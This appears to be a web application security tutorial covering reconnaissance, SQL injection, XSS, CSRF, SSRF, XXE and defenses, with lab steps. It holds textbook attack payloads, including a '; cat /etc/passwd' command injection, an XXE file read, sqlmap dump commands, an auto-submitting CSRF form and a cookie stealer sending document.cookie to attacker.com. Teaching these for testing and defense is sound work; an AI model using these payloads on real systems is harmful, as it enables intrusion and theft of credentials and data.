🌐 Web Security

Web Application Security Complete Guide

Complete guide to web application security — reconnaissance, vulnerabilities, exploitation, and defenses.

Introduction to Web App Security

Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.


1. Web App Reconnaissance

Information Gathering

Tools

💻 Terminal Recon Tools
sublist3r -d example.com
wappalyzer.com
gobuster dir -u https://example.com -w /path/to/wordlist.txt

2. Common Web Vulnerabilities

A. Injection Attacks

1. SQL Injection (SQLi)

Tools: SQLmap, Burp Suite

Example:

🗄️ SQL SQL Injection
SELECT * FROM users WHERE username = 'admin'--' AND password = ''

2. Command Injection

Executing OS commands via input fields:

💻 Bash Command Injection
; cat /etc/passwd

3. Cross-Site Scripting (XSS)


B. Broken Authentication

1. Credential Stuffing

Tools: Hydra, Burp Intruder

2. Session Hijacking

Tools: Ferret, Hamster

3. Default Credentials


C. Sensitive Data Exposure

1. Insecure APIs

Tools: Postman, Burp Suite

2. Directory Listing


D. Security Misconfigurations

1. Exposed Admin Panels

2. Verbose Error Messages


E. Cross-Site Request Forgery (CSRF)

🌐 HTML CSRF Attack
<img src="https://bank.com/transfer?amount=1000&to=attacker">

F. Server-Side Request Forgery (SSRF)

🌐 URL SSRF
https://example.com/fetch?url=http://localhost

G. XML External Entity (XXE)

📄 XML XXE Attack
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

3. Exploitation Techniques

Step 1: Automated Scanning

Step 2: Manual Testing

Step 3: Post-Exploitation


4. Hands-On Labs

Lab 1: SQL Injection with SQLmap

1. Find vulnerable parameter:

💻 Terminal SQLmap - Find DB
sqlmap -u "https://example.com/login?id=1" --dbs

2. Dump database:

💻 Terminal SQLmap - Dump
sqlmap -u "https://example.com/login?id=1" -D dbname --tables

Lab 2: XSS Exploitation

1. Inject payload in search box:

🌐 HTML XSS Payload
<script>alert(document.cookie)</script>

2. Steal cookies:

📜 JavaScript Cookie Stealer
fetch('https://attacker.com/log?cookie=' + document.cookie)

Lab 3: CSRF Attack

1. Craft malicious HTML:

🌐 HTML CSRF Payload
<form action="https://bank.com/transfer" method="POST">
    <input type="hidden" name="amount" value="1000">
    <input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>

5. Defensive Measures

Secure Coding Practices

✔ Input validation

✔ Prepared statements — SQLi

✔ CSP headers — XSS

✔ CSRF tokens

Security Tools


6. Bug Bounty & Ethical Hacking

Platforms

Methodology

  1. Recon
  2. Vulnerability Scanning
  3. Exploitation
  4. Reporting

Conclusion

🔹 Next Steps

🚀 Would you like a deep dive into bypassing WAFs?